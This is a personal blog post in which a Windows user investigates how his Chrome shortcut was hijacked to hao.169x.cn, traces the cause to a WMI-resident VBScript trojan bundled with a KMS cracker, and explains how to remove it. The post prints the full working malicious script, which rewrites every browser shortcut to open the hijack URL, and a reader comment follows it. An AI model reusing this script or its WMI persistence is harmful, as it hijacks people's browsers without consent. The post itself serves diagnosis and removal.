hao.169x.cn hacked my chrome shortcut

I am running windows 10 and i am bothered by this problem. i usualy have chrome shortcut in my QuickLaunch. but sometimes its become launching “hao.169x.cn” shortcut..

i mean its when i create shortcut, its target is –

C:\Users\ManojBhakarPCM\AppData\Local\Google\Chrome\Application\chrome.exe

but after some minuts/hoursd, its target get changes and it now targeting –

C:\Users\ManojBhakarPCM\AppData\Local\Google\Chrome\Application\chrome.exe http://hao.169x.cn/?v=108 

Some Experiments to Find Changer Process

  1. first i searched v=108 containing files in C:\ Drive with UltraFindFiles Lite.But it reveals nothing. i mean nothing found in any files accept some ADWCleaners log files.

so this method failed.

2. second, i tried to monitor changes in the shortcut file. so , with SystemInternal’s ProcMon, i captured events for 2 Hours. to find desired events among 2,77,45,606  events,

i noticed shortcut’s  “Date Modified” property. it shows “4/1/2017 6:13PM”

so first i filtered file changing events by Path as follows-

if path is C:\Users\ManojBhakarPCM\Desktop\chrome.lnk then include

then checked Menu-Tool–> File Summary , and i saw there only two File Write Events Total.

But i dont know how to filter write events. so i added one more filter for highlighting  as follows-

if Details Contains Write then include

this actually reduced the events to look for. there were still many events- those who had details of QueryBasicInformationFile event. they had events of LastWrite containing String .

But i looked for specific time – 6:13 PM. and i got soon.

Two Processes have Opened the shortcut file for Writing.

ScreenShot_20170104211425.png

and as far as i understood, scrcons.exe Rewrite my chrome.lnk shortcut file.

but i checked sfc, none of windows system files are tempered., i scanned my whole computer with Zemana Antivirus, ADWCleaner . they only removes Shortcuts, and some Registry Entries , But not the Creater.. i am still infected.

oh yes, with Zemana Antivirus, i always detect four instance of hao.169x.cn, 2 as shortcuts and other 2 are registry entries. which is –

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\UFH\SHC

sub key number 108 and 118 has the entries. –

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
http://hao.169x.cn/?v=108

..

New Tests –

Sending scrcons.exe to virus total via virus total uploader-

its Safe.. Nothing found. 😦

this scrcons.exe is in wbem folder. and i noticed suspicius activity of WmiPrvSE.exe which is also located in same folder.

help if anybody know about it. i am still infected.

UPDATE: FOUND the Cause And Solution.

yes. its a trojan. it comes with KMS 10 .(KMS is All Microsoft Software Cracker) .

this trojan is a VBScript which resides in WMI. it always run either after a fixed interval of time or windows logon.(Restarting or waking up from sleep).

in WMI, event name is VBScriptKids_consumer .. you can search this word on net to get other blogs about it.

To Remove–>

  1.  install WMI Event Viewer.
  2.  connect to namespace root\CIMv2
  3. within this namespace, delete all vbscriptkids named entry from all – Timers, Consumers, Filters. and you are done.

the Script is VBScript inside WMI and i Reformatted it to copy paste here.

On Error Resume Next
Const link = "http://hao.169x.cn/?v=108"
Const link360 = "http://hao.169x.cn/?v=108&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\ManojBhakarPCM\Desktop,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\ManojBhakarPCM\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
oDic.Add LCase(browser), browser
Next
lnkpathsArr = split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
If fso.FolderExists(oFolder) Then
For Each file In fso.GetFolder(oFolder).Files
If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
Set oShellLink = WshShell.CreateShortcut(file.Path)
path = oShellLink.TargetPath
name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
If oDic.Exists(LCase(name)) Then
If LCase(name) = LCase("360se.exe") Then
oShellLink.Arguments = link360
Else
oShellLink.Arguments = link
End If
If file.Attributes And 1 Then
file.Attributes = file.Attributes - 1
End If
oShellLink.Save
End If
End If
Next
End If
Next

which simply reads- modify shortcuts of all kind of browsers which may resides in QuickLaunch, Desktop, StartMenu .

Now i have deleted everything related to this in WMI and reCreated all shortcuts. and waiting if problem comes again.

Advertisements

2 thoughts on “hao.169x.cn hacked my chrome shortcut

  1. Hi Manoj.
    I finally found on the Internet a sensible reply concerning my problem (in an understandable language for me). I caught exactly the same ailment as you (hao.169x.cn) and exactly the same way (KMS10). Thanks to your post I located where the trash hides but unfortunately I can not get rid of it.
    Of course first I removed KMS. Then, following your instructions:
    – I installed WMI Event Viewer,
    – I located all entries VBScriptKids (in all – Consumers, Filters, Timers) and got to the poisoned script
    – And… I can not remove it 😦
    Unfortunately the command “Delete instance” (in the WMI Event Registartion Editor’ pop-up menu) – does not work. In response, I get the message “WMI Access denied. Can not delete instance \\ …”.
    I would be very grateful if you could explain to me more precisely how I can remove this stuff from the system? I am a rather ordinary windows user but I think still I’m not a dilettante ;). Please your help.
    I use Win7/64 and w.b. FF.
    Regards
    yanoo

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s